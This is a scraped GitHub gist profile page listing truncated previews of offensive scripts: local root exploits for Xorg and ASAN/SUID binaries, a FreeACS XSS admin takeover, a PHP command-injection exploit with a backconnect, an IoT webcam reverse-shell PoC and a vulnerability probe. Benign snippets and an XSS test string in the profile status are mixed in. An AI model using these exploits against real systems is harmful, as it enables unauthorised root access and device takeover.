Skip to content

Instantly share code, notes, and snippets.

View 0x27's full-sized avatar
💭
'"/><script>alert(0)</script>

David Davidson 0x27

💭
'"/><script>alert(0)</script>
View GitHub Profile
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
#********************************************************************
# CONFIGURAGION FILE FOR ADCD Z/OS 1.10 SUMMER *
#********************************************************************
# FOR ALL THE LOADPARM OPTIONS VISIT: *
# http://dtsc.dfw.ibm.com/MVSDS/'HTTPD2.ADCD.GLOBAL.HTML(READ110S)' *
#********************************************************************
# CUSTOM LOADPARM OPTIONS *
# SA - LOADS ALL LIBRARIES AND STARTS UP AUTOMATION (JES2) *
# J3 - LOADS ALL LIBRARIES AND STARTS UP BASIC z/OS SYSTEM (JES3) *
#********************************************************************
#!/usr/bin/env bash
# SEE YOU SPACE COWBOY by DANIEL REHN (danielrehn.com)
# Displays a timeless message in your terminal with cosmic color effects
# Usage: add "sh ~/seeyouspacecowboy.sh; sleep 2" to .bash_logout (or similar) in your home directory
# (adjust the sleep variable to display the message for more seconds)
# Cosmic color sequence
#!/bin/bash
echo "SSH hangup user tool. For killing other users connections."
if [ $# -eq 0 ]
then
echo "use: $0 <PTS number to kill>"
exit
fi
echo "Terminating PTS/$1"
OWNER=$(stat -c '%U' /dev/pts/$i)
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1)
@0x27
0x27 / freeacs-pwn.py
Created April 7, 2017 14:08
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User
#!/usr/bin/python
# worlds cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs - freeacs.com
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# HACK THE PLANET!
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
#!/usr/bin/python2
# coding: utf-8
# Example of how not to code PHP... Not a serious exploit, just one for fun as
# an example of how fucking badly people screw up. Picked an app while githubbin'
# and heres the ruinage.
# Exploits trivial command injection, followed by abusing the lolsudo implemented.
# Seriously, this dudes programming licence needs to be revoked.
# BONUS: Includes SCTP Backconnect for Great Justice reasons :D
# Screenshot: http://i.imgur.com/0CWDs8m.png
# Twitter: @dailydavedavids
#!/usr/bin/python2
# coding: utf-8
# implements: https://twitter.com/twisteddoodles/status/863474505808846848
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
@0x27
0x27 / upwned247.php
Created May 5, 2017 11:44 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
<?php
/*
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
-------------------------
NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
@0x27
0x27 / misfortunecookie.py
Last active January 20, 2017 05:05
checks for misfortune cookie vuln
#!/usr/bin/python2
# coding: utf-8
# misfortune cookie probe
# ~ skyhighatrist
import requests
import sys
def check(ip):
print "{+} Probing %s for the Misfortune Cookie Vuln..." %(ip)
url = "http://%s:7547/lol" %(ip) # /lol will never exist so it makes a good canary